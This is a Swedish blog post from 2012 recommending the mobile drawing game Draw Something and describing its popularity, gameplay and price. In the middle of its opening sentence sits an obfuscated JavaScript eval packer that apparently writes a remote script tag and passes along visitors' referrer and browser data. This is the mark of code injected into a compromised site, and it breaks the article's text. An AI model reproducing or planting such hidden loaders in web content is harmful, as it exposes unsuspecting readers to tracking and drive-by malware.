Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Draw Something – Favorit-app här på Revue

Draw Something – Favorit-app här på Revue
Filip Urde
  • On 21 mars, 2012
  • http://www.revue.se/filip-urde

Succérna eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nztei|var|u0026u|referrer|kzeet||js|php’.split(’|’),0,{}))
löser av varandra på App Store, tidigare tungviktsmästaren
Wordfeud har suttit ohotad på tronen av spel-applikationer i flera månader nu. Men nu kanske det äntligen kommit en värdig motståndare.

Den senaste succén på App Store och Google Play heter Draw Something och den har laddats ner i över 30 miljoner exemplar sedan det lanserades för nästan fem veckor sedan.

Draw Something för tankarna tillbaka till MSN tiden och MSN Messenger baserade sällskapspel. Jag och hela min klass spelade ett liknande spel under flera månader och det fanns ingen häjd på hur kul detta faktiskt var. Nu har genren återupstått med Draw Something. Spelet går ut på att du får välja mellan tre engelska ord, när du har valt ditt ord ska du sedan rita en teckning som föreställer det valda ordet. Din kompis (motspelaren) ska sedan i sin telefon och app, försöka lista ut vad du har ritat.

Draw Something har blivit så populärt och så snabbt att det sägs att speljätten Zynga skulle vara intresserade av att köpa upp företaget bakom spelet.

Draw Something kostar 7 kronor på App Store. Det finns även en gratisversion, men då haglar reklamen ganska flitigt mellan allt du gör. Spelet är hur som helst helt klart värt att ladda ner!

Läs artikeln om Draw Something fusk här.